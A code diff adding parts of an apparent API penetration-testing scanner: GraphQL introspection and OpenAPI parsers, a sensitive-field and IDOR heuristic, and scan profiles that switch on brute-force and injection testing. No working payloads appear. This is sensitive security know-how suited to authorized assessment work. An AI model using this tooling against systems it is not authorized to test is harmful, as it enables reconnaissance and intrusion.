+  async function createFinding(params: {
+    title: string
+    description: string
+    severity: PentestTypes.Severity
+    category: string
+    target: string
+    path?: string
+    sessionId?: string
+    storage?: StorageConfig
+  }): Promise<PentestTypes.Finding> {
+    const finding: Omit<PentestTypes.Finding, "id"> = {
+      title: params.title,
+      description: params.description,
+      severity: params.severity,
+      target: params.target,
+      sessionID: params.sessionId || `session_${Date.now()}`,
+      status: "open",
+      createdAt: Date.now(),
+    }
+
+    return Findings.create(finding)
+  }
+
+  /**
+   * Increment severity count in stats.
+   */
+  function incrementSeverityCount(stats: ApiScanTypes.ScanStats, severity: PentestTypes.Severity): void {
+    switch (severity) {
+      case "critical":
+        stats.criticalCount++
+        break
+      case "high":
+        stats.highCount++
+        break
+      case "medium":
+        stats.mediumCount++
+        break
+      case "low":
+        stats.lowCount++
+        break
+      case "info":
+        stats.infoCount++
+        break
+    }
+  }
+
+  /**
+   * Get scan status.
+   *
+   * @param scanId - Scan ID
+   * @param storage - Storage config
+   * @returns Scan result or null
+   */
+  export async function getStatus(scanId: string, storage?: StorageConfig): Promise<ApiScanTypes.ApiScanResult | null> {
+    return ApiScanStorage.getScan(scanId, storage)
+  }
+
+  /**
+   * List recent scans.
+   *
+   * @param storage - Storage config
+   * @param limit - Maximum results
+   * @returns Array of scan results
+   */
+  export async function listScans(storage?: StorageConfig, limit = 10): Promise<ApiScanTypes.ApiScanResult[]> {
+    return ApiScanStorage.listScans(storage, { limit })
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/parsers/graphql.ts b/packages/opencode/src/pentest/apiscan/parsers/graphql.ts
new file mode 100644
index 00000000000..2d0b64b4039
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/parsers/graphql.ts
@@ -0,0 +1,478 @@
+/**
+ * @fileoverview GraphQL Introspection Parser
+ *
+ * Parses GraphQL introspection responses to extract
+ * schema information, types, and operations.
+ *
+ * @module pentest/apiscan/parsers/graphql
+ */
+
+import { randomBytes } from "crypto"
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.graphql" })
+
+/**
+ * GraphQL parser namespace.
+ */
+export namespace GraphQLParser {
+  /**
+   * Standard GraphQL introspection query.
+   */
+  export const INTROSPECTION_QUERY = `
+    query IntrospectionQuery {
+      __schema {
+        queryType { name }
+        mutationType { name }
+        subscriptionType { name }
+        types {
+          name
+          kind
+          description
+          fields(includeDeprecated: true) {
+            name
+            description
+            args {
+              name
+              description
+              type { name kind ofType { name kind } }
+              defaultValue
+            }
+            type { name kind ofType { name kind } }
+            deprecationReason
+          }
+          inputFields {
+            name
+            description
+            type { name kind ofType { name kind } }
+            defaultValue
+          }
+          enumValues(includeDeprecated: true) {
+            name
+            description
+            deprecationReason
+          }
+        }
+        directives {
+          name
+          description
+          locations
+          args {
+            name
+            description
+            type { name kind ofType { name kind } }
+            defaultValue
+          }
+        }
+      }
+    }
+  `
+
+  /**
+   * Parse a GraphQL introspection response.
+   *
+   * @param input - JSON string or introspection result object
+   * @param baseUrl - Base URL for the GraphQL endpoint
+   * @returns Parsed API spec
+   */
+  export function parse(input: string | object, baseUrl: string): ApiScanTypes.ApiSpec {
+    const data = typeof input === "string" ? JSON.parse(input) : input
+    const schema = extractSchema(data)
+
+    log.info("Parsing GraphQL introspection", { baseUrl })
+
+    const graphqlSchema = parseSchema(schema)
+    const endpoints = convertToEndpoints(graphqlSchema, baseUrl)
+
+    return {
+      id: generateSpecId(),
+      target: baseUrl,
+      type: "graphql",
+      title: "GraphQL API",
+      endpoints,
+      securitySchemes: [], // GraphQL doesn't have standardized security schemes
+      graphqlSchema,
+      servers: [baseUrl],
+      discoveredAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate a unique spec ID.
+   */
+  function generateSpecId(): string {
+    const timestamp = Date.now().toString(36)
+    const random = randomBytes(6).toString("hex")
+    return `spec_${timestamp}_${random}`
+  }
+
+  /**
+   * Generate a unique endpoint ID.
+   */
+  function generateEndpointId(): string {
+    const random = randomBytes(4).toString("hex")
+    return `ep_${random}`
+  }
+
+  /**
+   * Extract schema from introspection response.
+   *
+   * @param data - Introspection response
+   * @returns Schema object
+   */
+  function extractSchema(data: Record<string, unknown>): Record<string, unknown> {
+    // Handle different response formats
+    if (data.__schema) {
+      return data.__schema as Record<string, unknown>
+    }
+    if (data.data && (data.data as Record<string, unknown>).__schema) {
+      return (data.data as Record<string, unknown>).__schema as Record<string, unknown>
+    }
+    throw new Error("Invalid GraphQL introspection response: missing __schema")
+  }
+
+  /**
+   * Parse schema to our type definitions.
+   *
+   * @param schema - Raw schema object
+   * @returns Parsed GraphQL schema
+   */
+  function parseSchema(schema: Record<string, unknown>): ApiScanTypes.GraphQLSchema {
+    const types = parseTypes((schema.types as unknown[]) || [])
+    const directives = parseDirectives((schema.directives as unknown[]) || [])
+
+    return {
+      queryType: (schema.queryType as { name: string } | undefined)?.name,
+      mutationType: (schema.mutationType as { name: string } | undefined)?.name,
+      subscriptionType: (schema.subscriptionType as { name: string } | undefined)?.name,
+      types,
+      directives,
+    }
+  }
+
+  /**
+   * Parse GraphQL types.
+   *
+   * @param types - Raw type array
+   * @returns Parsed types
+   */
+  function parseTypes(types: unknown[]): ApiScanTypes.GraphQLType[] {
+    const result: ApiScanTypes.GraphQLType[] = []
+
+    for (const t of types) {
+      const type = t as Record<string, unknown>
+      const name = type.name as string
+
+      // Skip built-in types
+      if (name.startsWith("__")) continue
+
+      const kind = type.kind as string
+      const validKinds = ["OBJECT", "INPUT_OBJECT", "ENUM", "SCALAR", "INTERFACE", "UNION"]
+      if (!validKinds.includes(kind)) continue
+
+      result.push({
+        name,
+        kind: kind as ApiScanTypes.GraphQLType["kind"],
+        fields: parseFields((type.fields as unknown[]) || (type.inputFields as unknown[]) || []),
+        enumValues: parseEnumValues((type.enumValues as unknown[]) || []),
+        description: type.description as string | undefined,
+      })
+    }
+
+    log.info("Parsed GraphQL types", { count: result.length })
+    return result
+  }
+
+  /**
+   * Parse GraphQL fields.
+   *
+   * @param fields - Raw fields array
+   * @returns Parsed fields
+   */
+  function parseFields(fields: unknown[]): ApiScanTypes.GraphQLField[] {
+    return fields.map((f) => {
+      const field = f as Record<string, unknown>
+      return {
+        name: field.name as string,
+        type: formatTypeName(field.type as Record<string, unknown>),
+        args: parseFieldArgs((field.args as unknown[]) || []),
+        description: field.description as string | undefined,
+        deprecationReason: field.deprecationReason as string | undefined,
+      }
+    })
+  }
+
+  /**
+   * Parse field arguments.
+   *
+   * @param args - Raw args array
+   * @returns Parsed arguments
+   */
+  function parseFieldArgs(
+    args: unknown[]
+  ): Array<{ name: string; type: string; defaultValue?: unknown }> {
+    return args.map((a) => {
+      const arg = a as Record<string, unknown>
+      return {
+        name: arg.name as string,
+        type: formatTypeName(arg.type as Record<string, unknown>),
+        defaultValue: arg.defaultValue,
+      }
+    })
+  }
+
+  /**
+   * Format type name from GraphQL type object.
+   *
+   * @param type - Type object
+   * @returns Formatted type name
+   */
+  function formatTypeName(type: Record<string, unknown>): string {
+    if (!type) return "Unknown"
+
+    const name = type.name as string | null
+    const kind = type.kind as string
+    const ofType = type.ofType as Record<string, unknown> | undefined
+
+    if (kind === "NON_NULL") {
+      return `${formatTypeName(ofType!)}!`
+    }
+    if (kind === "LIST") {
+      return `[${formatTypeName(ofType!)}]`
+    }
+    return name || "Unknown"
+  }
+
+  /**
+   * Parse enum values.
+   *
+   * @param values - Raw enum values array
+   * @returns Array of enum value names
+   */
+  function parseEnumValues(values: unknown[]): string[] {
+    return values.map((v) => (v as Record<string, unknown>).name as string)
+  }
+
+  /**
+   * Parse directives.
+   *
+   * @param directives - Raw directives array
+   * @returns Array of directive names
+   */
+  function parseDirectives(directives: unknown[]): string[] {
+    return directives
+      .map((d) => (d as Record<string, unknown>).name as string)
+      .filter((name) => !["skip", "include", "deprecated"].includes(name))
+  }
+
+  /**
+   * Convert GraphQL schema to API endpoints.
+   *
+   * @param schema - Parsed GraphQL schema
+   * @param baseUrl - Base URL
+   * @returns Array of API endpoints
+   */
+  function convertToEndpoints(schema: ApiScanTypes.GraphQLSchema, baseUrl: string): ApiScanTypes.ApiEndpoint[] {
+    const endpoints: ApiScanTypes.ApiEndpoint[] = []
+
+    // Find root types
+    const queryType = schema.types.find((t) => t.name === schema.queryType)
+    const mutationType = schema.types.find((t) => t.name === schema.mutationType)
+
+    // Convert query fields to GET endpoints
+    if (queryType?.fields) {
+      for (const field of queryType.fields) {
+        endpoints.push(fieldToEndpoint(field, "GET", baseUrl))
+      }
+    }
+
+    // Convert mutation fields to POST endpoints
+    if (mutationType?.fields) {
+      for (const field of mutationType.fields) {
+        endpoints.push(fieldToEndpoint(field, "POST", baseUrl))
+      }
+    }
+
+    log.info("Converted to endpoints", { count: endpoints.length })
+    return endpoints
+  }
+
+  /**
+   * Convert a GraphQL field to an API endpoint.
+   *
+   * @param field - GraphQL field
+   * @param method - HTTP method
+   * @param baseUrl - Base URL
+   * @returns API endpoint
+   */
+  function fieldToEndpoint(
+    field: ApiScanTypes.GraphQLField,
+    method: ApiScanTypes.HttpMethod,
+    baseUrl: string
+  ): ApiScanTypes.ApiEndpoint {
+    const parameters: ApiScanTypes.ApiParameter[] = (field.args || []).map((arg) => ({
+      name: arg.name,
+      in: "body" as const,
+      type: mapGraphQLType(arg.type),
+      required: arg.type.endsWith("!"),
+      description: undefined,
+    }))
+
+    return {
+      id: generateEndpointId(),
+      path: `/graphql#${field.name}`,
+      method,
+      summary: field.description || `GraphQL ${method === "GET" ? "query" : "mutation"}: ${field.name}`,
+      description: field.description,
+      operationId: field.name,
+      parameters,
+      responses: [
+        {
+          statusCode: 200,
+          description: `Returns ${field.type}`,
+          contentType: "application/json",
+        },
+      ],
+      tags: ["GraphQL"],
+      deprecated: !!field.deprecationReason,
+    }
+  }
+
+  /**
+   * Map GraphQL type to API parameter type.
+   *
+   * @param typeName - GraphQL type name
+   * @returns API parameter type
+   */
+  function mapGraphQLType(typeName: string): ApiScanTypes.ParameterType {
+    const normalized = typeName.replace(/[!\[\]]/g, "")
+    const mapping: Record<string, ApiScanTypes.ParameterType> = {
+      String: "string",
+      Int: "integer",
+      Float: "number",
+      Boolean: "boolean",
+      ID: "string",
+    }
+    return mapping[normalized] || "object"
+  }
+
+  /**
+   * Check if introspection is enabled.
+   *
+   * @param response - Fetch response or error
+   * @returns true if introspection is enabled
+   */
+  export function isIntrospectionEnabled(response: string | object): boolean {
+    try {
+      const data = typeof response === "string" ? JSON.parse(response) : response
+      const schema = data.__schema || data.data?.__schema
+      return !!schema
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Validate if input looks like a GraphQL introspection response.
+   *
+   * @param input - Input to validate
+   * @returns true if valid introspection
+   */
+  export function isValidIntrospection(input: string | object): boolean {
+    try {
+      const data = typeof input === "string" ? JSON.parse(input) : input
+      const schema = data.__schema || data.data?.__schema
+      return !!schema && Array.isArray(schema.types)
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Extract security-relevant information from schema.
+   *
+   * @param schema - Parsed GraphQL schema
+   * @returns Security insights
+   */
+  export function analyzeSecurityPatterns(schema: ApiScanTypes.GraphQLSchema): {
+    hasSensitiveQueries: boolean
+    sensitiveFields: string[]
+    hasDeprecatedFields: boolean
+    potentialIssues: string[]
+  } {
+    const sensitivePatterns = [
+      /password/i,
+      /secret/i,
+      /token/i,
+      /key/i,
+      /credential/i,
+      /ssn/i,
+      /credit.?card/i,
+    ]
+
+    const sensitiveFields: string[] = []
+    let hasDeprecatedFields = false
+    const potentialIssues: string[] = []
+
+    for (const type of schema.types) {
+      if (!type.fields) continue
+
+      for (const field of type.fields) {
+        // Check for sensitive field names
+        for (const pattern of sensitivePatterns) {
+          if (pattern.test(field.name)) {
+            sensitiveFields.push(`${type.name}.${field.name}`)
+          }
+        }
+
+        // Check for deprecated fields
+        if (field.deprecationReason) {
+          hasDeprecatedFields = true
+        }
+
+        // Check for potential IDOR patterns
+        if (field.args?.some((arg) => /id/i.test(arg.name))) {
+          potentialIssues.push(`Potential IDOR: ${type.name}.${field.name} accepts ID parameter`)
+        }
+      }
+    }
+
+    return {
+      hasSensitiveQueries: sensitiveFields.length > 0,
+      sensitiveFields,
+      hasDeprecatedFields,
+      potentialIssues,
+    }
+  }
+
+  /**
+   * Format schema summary for display.
+   *
+   * @param schema - GraphQL schema
+   * @returns Formatted summary
+   */
+  export function formatSummary(schema: ApiScanTypes.GraphQLSchema): string {
+    const lines: string[] = []
+    lines.push("GraphQL Schema Summary")
+    lines.push("======================")
+    lines.push(`Query Type: ${schema.queryType || "None"}`)
+    lines.push(`Mutation Type: ${schema.mutationType || "None"}`)
+    lines.push(`Subscription Type: ${schema.subscriptionType || "None"}`)
+    lines.push(`Types: ${schema.types.length}`)
+    lines.push(`Directives: ${schema.directives?.length || 0}`)
+
+    // Count queries and mutations
+    const queryType = schema.types.find((t) => t.name === schema.queryType)
+    const mutationType = schema.types.find((t) => t.name === schema.mutationType)
+
+    if (queryType?.fields) {
+      lines.push(`\nQueries: ${queryType.fields.length}`)
+    }
+    if (mutationType?.fields) {
+      lines.push(`Mutations: ${mutationType.fields.length}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/parsers/index.ts b/packages/opencode/src/pentest/apiscan/parsers/index.ts
new file mode 100644
index 00000000000..0ead5ce15c3
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/parsers/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @fileoverview API Spec Parsers
+ *
+ * Exports OpenAPI and GraphQL parsers.
+ *
+ * @module pentest/apiscan/parsers
+ */
+
+export { OpenApiParser } from "./openapi"
+export { GraphQLParser } from "./graphql"
diff --git a/packages/opencode/src/pentest/apiscan/parsers/openapi.ts b/packages/opencode/src/pentest/apiscan/parsers/openapi.ts
new file mode 100644
index 00000000000..58470dada39
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/parsers/openapi.ts
@@ -0,0 +1,450 @@
+/**
+ * @fileoverview OpenAPI/Swagger Parser
+ *
+ * Parses OpenAPI 2.0 (Swagger) and OpenAPI 3.x specifications
+ * to extract API endpoints and security schemes.
+ *
+ * @module pentest/apiscan/parsers/openapi
+ */
+
+import { randomBytes } from "crypto"
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.openapi" })
+
+/**
+ * OpenAPI parser namespace.
+ */
+export namespace OpenApiParser {
+  /**
+   * Parse an OpenAPI specification.
+   *
+   * @param input - JSON string or object
+   * @param baseUrl - Base URL for the API
+   * @returns Parsed API spec
+   */
+  export function parse(input: string | object, baseUrl: string): ApiScanTypes.ApiSpec {
+    const spec = typeof input === "string" ? JSON.parse(input) : input
+    const version = detectVersion(spec)
+
+    log.info("Parsing OpenAPI spec", { version, baseUrl })
+
+    const endpoints = extractEndpoints(spec, version)
+    const securitySchemes = extractSecuritySchemes(spec, version)
+    const servers = extractServers(spec, version, baseUrl)
+
+    return {
+      id: generateSpecId(),
+      target: baseUrl,
+      type: "openapi",
+      version,
+      title: spec.info?.title,
+      description: spec.info?.description,
+      endpoints,
+      securitySchemes,
+      servers,
+      discoveredAt: Date.now(),
+    }
+  }
+
+  /**
+   * Detect OpenAPI version from spec.
+   *
+   * @param spec - OpenAPI specification object
+   * @returns Version string (2.0, 3.0.x, 3.1.x)
+   */
+  function detectVersion(spec: Record<string, unknown>): string {
+    if (spec.openapi && typeof spec.openapi === "string") {
+      return spec.openapi
+    }
+    if (spec.swagger && typeof spec.swagger === "string") {
+      return spec.swagger
+    }
+    return "unknown"
+  }
+
+  /**
+   * Generate a unique spec ID.
+   */
+  function generateSpecId(): string {
+    const timestamp = Date.now().toString(36)
+    const random = randomBytes(6).toString("hex")
+    return `spec_${timestamp}_${random}`
+  }
+
+  /**
+   * Generate a unique endpoint ID.
+   */
+  function generateEndpointId(): string {
+    const random = randomBytes(4).toString("hex")
+    return `ep_${random}`
+  }
+
+  /**
+   * Extract endpoints from OpenAPI spec.
+   *
+   * @param spec - OpenAPI specification object
+   * @param version - OpenAPI version
+   * @returns Array of API endpoints
+   */
+  function extractEndpoints(spec: Record<string, unknown>, version: string): ApiScanTypes.ApiEndpoint[] {
+    const endpoints: ApiScanTypes.ApiEndpoint[] = []
+    const paths = spec.paths as Record<string, Record<string, unknown>> | undefined
+
+    if (!paths) {
+      log.warn("No paths found in OpenAPI spec")
+      return endpoints
+    }
+
+    const methods: ApiScanTypes.HttpMethod[] = ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"]
+
+    for (const [path, pathItem] of Object.entries(paths)) {
+      if (!pathItem || typeof pathItem !== "object") continue
+
+      for (const method of methods) {
+        const operation = pathItem[method.toLowerCase()] as Record<string, unknown> | undefined
+        if (!operation) continue
+
+        const endpoint = parseOperation(path, method, operation, pathItem, version)
+        endpoints.push(endpoint)
+      }
+    }
+
+    log.info("Extracted endpoints", { count: endpoints.length })
+    return endpoints
+  }
+
+  /**
+   * Parse a single operation.
+   *
+   * @param path - API path
+   * @param method - HTTP method
+   * @param operation - Operation object
+   * @param pathItem - Path item object (for shared parameters)
+   * @param version - OpenAPI version
+   * @returns Parsed endpoint
+   */
+  function parseOperation(
+    path: string,
+    method: ApiScanTypes.HttpMethod,
+    operation: Record<string, unknown>,
+    pathItem: Record<string, unknown>,
+    version: string
+  ): ApiScanTypes.ApiEndpoint {
+    // Combine path-level and operation-level parameters
+    const pathParams = (pathItem.parameters as unknown[]) || []
+    const opParams = (operation.parameters as unknown[]) || []
+    const allParams = [...pathParams, ...opParams]
+
+    const parameters = allParams.map((p) => parseParameter(p as Record<string, unknown>, version))
+    const requestBody = version.startsWith("3")
+      ? parseRequestBody(operation.requestBody as Record<string, unknown> | undefined)
+      : parseSwaggerBody(allParams)
+
+    const responses = parseResponses(operation.responses as Record<string, unknown> | undefined)
+    const security = parseSecurityRequirements(operation.security as Array<Record<string, string[]>> | undefined)
+
+    return {
+      id: generateEndpointId(),
+      path,
+      method,
+      summary: operation.summary as string | undefined,
+      description: operation.description as string | undefined,
+      operationId: operation.operationId as string | undefined,
+      parameters: parameters.filter((p) => p.in !== "body"), // Exclude body params (handled separately)
+      requestBody,
+      responses,
+      security,
+      tags: operation.tags as string[] | undefined,
+      deprecated: operation.deprecated as boolean | undefined,
+    }
+  }
+
+  /**
+   * Parse a parameter.
+   *
+   * @param param - Parameter object
+   * @param version - OpenAPI version
+   * @returns Parsed parameter
+   */
+  function parseParameter(param: Record<string, unknown>, _version: string): ApiScanTypes.ApiParameter {
+    const location = (param.in as string) || "query"
+    const schema = param.schema as Record<string, unknown> | undefined
+
+    return {
+      name: (param.name as string) || "",
+      in: location as ApiScanTypes.ParameterLocation,
+      type: parseParameterType(param.type as string | undefined, schema),
+      required: (param.required as boolean) || false,
+      description: param.description as string | undefined,
+      example: param.example,
+      schema: schema,
+    }
+  }
+
+  /**
+   * Parse parameter type.
+   *
+   * @param type - Explicit type
+   * @param schema - Schema object
+   * @returns Parameter type
+   */
+  function parseParameterType(
+    type: string | undefined,
+    schema: Record<string, unknown> | undefined
+  ): ApiScanTypes.ParameterType {
+    const t = type || (schema?.type as string) || "string"
+    const validTypes: ApiScanTypes.ParameterType[] = ["string", "number", "integer", "boolean", "array", "object"]
+    return validTypes.includes(t as ApiScanTypes.ParameterType) ? (t as ApiScanTypes.ParameterType) : "string"
+  }
+
+  /**
+   * Parse OpenAPI 3.x request body.
+   *
+   * @param requestBody - Request body object
+   * @returns Parsed request body or undefined
+   */
+  function parseRequestBody(requestBody: Record<string, unknown> | undefined): ApiScanTypes.RequestBody | undefined {
+    if (!requestBody) return undefined
+
+    const content = requestBody.content as Record<string, Record<string, unknown>> | undefined
+    if (!content) return undefined
+
+    // Prefer JSON content type
+    const contentType = Object.keys(content).find((ct) => ct.includes("json")) || Object.keys(content)[0]
+    const mediaType = content[contentType]
+
+    return {
+      contentType,
+      required: (requestBody.required as boolean) || false,
+      schema: mediaType?.schema as Record<string, unknown> | undefined,
+      example: mediaType?.example,
+    }
+  }
+
+  /**
+   * Parse Swagger 2.0 body parameter.
+   *
+   * @param params - All parameters
+   * @returns Request body or undefined
+   */
+  function parseSwaggerBody(params: unknown[]): ApiScanTypes.RequestBody | undefined {
+    const bodyParam = params.find((p) => {
+      const param = p as Record<string, unknown>
+      return param.in === "body"
+    }) as Record<string, unknown> | undefined
+
+    if (!bodyParam) return undefined
+
+    return {
+      contentType: "application/json",
+      required: (bodyParam.required as boolean) || false,
+      schema: bodyParam.schema as Record<string, unknown> | undefined,
+    }
+  }
+
+  /**
+   * Parse responses.
+   *
+   * @param responses - Responses object
+   * @returns Array of response schemas
+   */
+  function parseResponses(responses: Record<string, unknown> | undefined): ApiScanTypes.ResponseSchema[] {
+    if (!responses) return []
+
+    const result: ApiScanTypes.ResponseSchema[] = []
+
+    for (const [status, response] of Object.entries(responses)) {
+      if (!response || typeof response !== "object") continue
+      const resp = response as Record<string, unknown>
+
+      const statusCode = status === "default" ? 0 : parseInt(status, 10)
+      if (isNaN(statusCode) && status !== "default") continue
+
+      const content = resp.content as Record<string, Record<string, unknown>> | undefined
+      const contentType = content ? Object.keys(content).find((ct) => ct.includes("json")) || Object.keys(content)[0] : undefined
+      const mediaType = content?.[contentType || ""]
+
+      result.push({
+        statusCode,
+        description: resp.description as string | undefined,
+        contentType,
+        schema: mediaType?.schema as Record<string, unknown> | undefined,
+      })
+    }
+
+    return result
+  }
+
+  /**
+   * Parse security requirements.
+   *
+   * @param security - Security requirements array
+   * @returns Array of security requirements
+   */
+  function parseSecurityRequirements(
+    security: Array<Record<string, string[]>> | undefined
+  ): ApiScanTypes.SecurityRequirement[] | undefined {
+    if (!security || security.length === 0) return undefined
+
+    const result: ApiScanTypes.SecurityRequirement[] = []
+
+    for (const req of security) {
+      for (const [name, scopes] of Object.entries(req)) {
+        result.push({ name, scopes })
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Extract security schemes.
+   *
+   * @param spec - OpenAPI specification object
+   * @param version - OpenAPI version
+   * @returns Array of security schemes
+   */
+  function extractSecuritySchemes(spec: Record<string, unknown>, version: string): ApiScanTypes.SecurityScheme[] {
+    const schemes: ApiScanTypes.SecurityScheme[] = []
+
+    // OpenAPI 3.x
+    if (version.startsWith("3")) {
+      const components = spec.components as Record<string, unknown> | undefined
+      const securitySchemes = components?.securitySchemes as Record<string, Record<string, unknown>> | undefined
+
+      if (securitySchemes) {
+        for (const [name, scheme] of Object.entries(securitySchemes)) {
+          schemes.push(parseSecurityScheme(name, scheme))
+        }
+      }
+    }
+    // Swagger 2.0
+    else {
+      const securityDefinitions = spec.securityDefinitions as Record<string, Record<string, unknown>> | undefined
+
+      if (securityDefinitions) {
+        for (const [name, scheme] of Object.entries(securityDefinitions)) {
+          schemes.push(parseSecurityScheme(name, scheme))
+        }
+      }
+    }
+
+    log.info("Extracted security schemes", { count: schemes.length })
+    return schemes
+  }
+
+  /**
+   * Parse a security scheme.
+   *
+   * @param name - Scheme name
+   * @param scheme - Scheme object
+   * @returns Parsed security scheme
+   */
+  function parseSecurityScheme(name: string, scheme: Record<string, unknown>): ApiScanTypes.SecurityScheme {
+    const type = scheme.type as string
+    const schemeType = mapSecuritySchemeType(type)
+
+    return {
+      name,
+      type: schemeType,
+      description: scheme.description as string | undefined,
+      in: scheme.in as "header" | "query" | "cookie" | undefined,
+      scheme: scheme.scheme as string | undefined,
+      bearerFormat: scheme.bearerFormat as string | undefined,
+      flows: scheme.flows as Record<string, unknown> | undefined,
+      openIdConnectUrl: scheme.openIdConnectUrl as string | undefined,
+    }
+  }
+
+  /**
+   * Map security scheme type to our enum.
+   *
+   * @param type - Raw type string
+   * @returns Mapped security scheme type
+   */
+  function mapSecuritySchemeType(type: string): ApiScanTypes.SecuritySchemeType {
+    const mapping: Record<string, ApiScanTypes.SecuritySchemeType> = {
+      apiKey: "apiKey",
+      http: "http",
+      oauth2: "oauth2",
+      openIdConnect: "openIdConnect",
+      basic: "http", // Swagger 2.0
+    }
+    return mapping[type] || "apiKey"
+  }
+
+  /**
+   * Extract servers/base paths.
+   *
+   * @param spec - OpenAPI specification object
+   * @param version - OpenAPI version
+   * @param baseUrl - Fallback base URL
+   * @returns Array of server URLs
+   */
+  function extractServers(spec: Record<string, unknown>, version: string, baseUrl: string): string[] {
+    // OpenAPI 3.x
+    if (version.startsWith("3")) {
+      const servers = spec.servers as Array<{ url: string }> | undefined
+      if (servers && servers.length > 0) {
+        return servers.map((s) => {
+          // Handle relative URLs
+          if (s.url.startsWith("/")) {
+            return new URL(s.url, baseUrl).toString()
+          }
+          return s.url
+        })
+      }
+    }
+    // Swagger 2.0
+    else {
+      const host = spec.host as string | undefined
+      const basePath = spec.basePath as string | undefined
+      const schemes = (spec.schemes as string[]) || ["https"]
+
+      if (host) {
+        const scheme = schemes.includes("https") ? "https" : schemes[0]
+        return [`${scheme}://${host}${basePath || ""}`]
+      }
+    }
+
+    return [baseUrl]
+  }
+
+  /**
+   * Validate if input looks like an OpenAPI spec.
+   *
+   * @param input - Input to validate
+   * @returns true if valid OpenAPI
+   */
+  export function isValidSpec(input: string | object): boolean {
+    try {
+      const spec = typeof input === "string" ? JSON.parse(input) : input
+      return !!(spec.openapi || spec.swagger) && !!spec.paths
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Format spec summary for display.
+   *
+   * @param spec - API spec
+   * @returns Formatted summary
+   */
+  export function formatSummary(spec: ApiScanTypes.ApiSpec): string {
+    const lines: string[] = []
+    lines.push(`API: ${spec.title || "Untitled"}`)
+    lines.push(`Type: OpenAPI ${spec.version}`)
+    lines.push(`Target: ${spec.target}`)
+    lines.push(`Endpoints: ${spec.endpoints.length}`)
+    lines.push(`Security Schemes: ${spec.securitySchemes.length}`)
+
+    if (spec.description) {
+      lines.push(`\nDescription: ${spec.description}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/profiles.ts b/packages/opencode/src/pentest/apiscan/profiles.ts
new file mode 100644
index 00000000000..4c3583839a0
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/profiles.ts
@@ -0,0 +1,351 @@
+/**
+ * @fileoverview API Scan Profiles
+ *
+ * Pre-defined scan profiles for different API testing scenarios.
+ *
+ * @module pentest/apiscan/profiles
+ */
+
+import { ApiScanTypes } from "./types"
+
+/**
+ * API scan profiles namespace.
+ */
+export namespace ApiScanProfiles {
+  /**
+   * Discovery profile - map API surface only.
+   */
+  export const Discovery: ApiScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Discover API endpoints without active testing",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: true,
+    },
+    authTests: {
+      enabled: false,
+      jwtAnalysis: false,
+      apiKeyTest: false,
+      oauthTest: false,
+      bruteForce: false,
+    },
+    injectionTests: {
+      enabled: false,
+      sql: false,
+      nosql: false,
+      command: false,
+    },
+    bolaTests: false,
+    timeout: 30000,
+  }
+
+  /**
+   * Quick profile - fast assessment.
+   */
+  export const Quick: ApiScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast API assessment with basic auth analysis",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: false,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true,
+      apiKeyTest: false,
+      oauthTest: false,
+      bruteForce: false,
+    },
+    injectionTests: {
+      enabled: false,
+      sql: false,
+      nosql: false,
+      command: false,
+    },
+    bolaTests: false,
+    timeout: 30000,
+  }
+
+  /**
+   * Standard profile - normal pentest.
+   */
+  export const Standard: ApiScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Standard API security assessment",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: true,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true,
+      apiKeyTest: true,
+      oauthTest: true,
+      bruteForce: false,
+    },
+    injectionTests: {
+      enabled: true,
+      sql: true,
+      nosql: true,
+      command: false,
+    },
+    bolaTests: true,
+    timeout: 60000,
+  }
+
+  /**
+   * Thorough profile - comprehensive scan.
+   */
+  export const Thorough: ApiScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive API security assessment with all tests",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: true,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true,
+      apiKeyTest: true,
+      oauthTest: true,
+      bruteForce: true,
+    },
+    injectionTests: {
+      enabled: true,
+      sql: true,
+      nosql: true,
+      command: true,
+    },
+    bolaTests: true,
+    rateLimit: 10, // 10 requests per second
+    timeout: 120000,
+  }
+
+  /**
+   * Passive profile - no active testing.
+   */
+  export const Passive: ApiScanTypes.ScanProfile = {
+    id: "passive",
+    name: "Passive",
+    description: "Passive analysis of API specification only",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: false,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true, // Can analyze provided tokens
+      apiKeyTest: false,
+      oauthTest: false,
+      bruteForce: false,
+    },
+    injectionTests: {
+      enabled: false,
+      sql: false,
+      nosql: false,
+      command: false,
+    },
+    bolaTests: false,
+    timeout: 30000,
+  }
+
+  /**
+   * Auth-focused profile - authentication testing focus.
+   */
+  export const AuthFocused: ApiScanTypes.ScanProfile = {
+    id: "auth-focused",
+    name: "Auth Focused",
+    description: "Focus on authentication and authorization testing",
+    discovery: {
+      enabled: true,
